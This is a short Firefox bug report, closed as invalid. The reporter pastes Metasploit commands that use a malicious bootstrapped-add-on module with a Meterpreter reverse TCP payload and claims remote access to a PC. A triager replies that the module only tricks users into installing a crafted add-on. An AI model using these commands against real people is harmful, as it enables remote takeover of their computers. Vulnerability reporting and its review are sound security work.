Closed Bug 788033 Opened 12 years ago Closed 12 years ago

Firefox Addon Bootstrap Exploit

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
15 Branch
Platform:
x86_64
Windows 7
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: skiller.rs1, Unassigned)

Details

Attachments

(1 file)

a.png
103.12 KB, image/png
Details
Attached image a.png 
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0
Build ID: 20120824154833

Steps to reproduce:

Pentesting in Backtrack 5 R3 and found a huge remote exploit in Firefox.


Code:
msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon

msf>set payload windows/meterpreter/reverse_tcp

msf>set lport 81

msf> set lhost 0.0.0.0

msf> set srvhost  yourip

msf> show targets

   Id  Name
   --  ----
   0   Generic (Java Payload)
   1   Windows x86 (Native Payload)
   2   Linux x86 (Native Payload)
   3   Mac OS X PPC (Native Payload)
   4   Mac OS X x86 (Native Payload)

msf> set target 1

msf > exploit


Actual results:

I was able to gain remote access to a PC, and was able to install malicious software if it was for malicious intentions.


Expected results:

The exploit shouldn't have existed in the first place.
this is not security sensitive
this is a module that creates a malicious xpi that is an attempt to get the user to install a crafted add-on
since add-ons can have chrome privileges they can do just about anything
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: